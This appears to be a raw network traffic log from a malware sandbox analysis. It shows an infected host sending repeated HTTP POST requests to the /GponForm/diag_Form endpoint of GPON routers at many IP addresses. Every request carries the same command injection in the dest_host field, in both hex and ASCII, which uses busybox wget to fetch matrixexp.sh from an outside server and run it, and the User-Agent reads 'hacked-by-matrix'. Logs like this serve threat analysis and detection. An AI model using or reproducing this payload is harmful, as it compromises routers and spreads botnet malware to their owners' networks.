                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1130192.168.2.13447165.240.33.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709228039 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1131192.168.2.1356602109.157.172.222443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709264994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1132192.168.2.1339910212.178.204.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709273100 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1133192.168.2.1357884109.125.211.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709274054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1134192.168.2.134387442.141.15.84443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709301949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1135192.168.2.1358510109.219.137.112443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709301949 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1136192.168.2.1359786212.173.133.33443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709306002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1137192.168.2.1357702212.52.212.77443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709307909 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1138192.168.2.1332896109.134.21.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709348917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1139192.168.2.1335438109.126.222.252443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709414959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1140192.168.2.1340384118.253.62.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709423065 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1141192.168.2.13609765.117.166.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709450006 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1142192.168.2.1356640212.119.232.186443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709474087 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1143192.168.2.13457585.165.111.212443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709486008 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1144192.168.2.1347156118.250.156.197443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709505081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1145192.168.2.1349146118.167.231.236443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709525108 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1146192.168.2.134436242.188.135.0443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709562063 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1147192.168.2.1345418109.140.11.175443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709579945 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1148192.168.2.13415925.51.128.162443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709618092 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1149192.168.2.1346804109.181.186.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709633112 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1150192.168.2.1353994118.181.175.226443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709651947 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1151192.168.2.13440265.31.134.224443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709680080 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1152192.168.2.1346186118.98.221.44443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709741116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


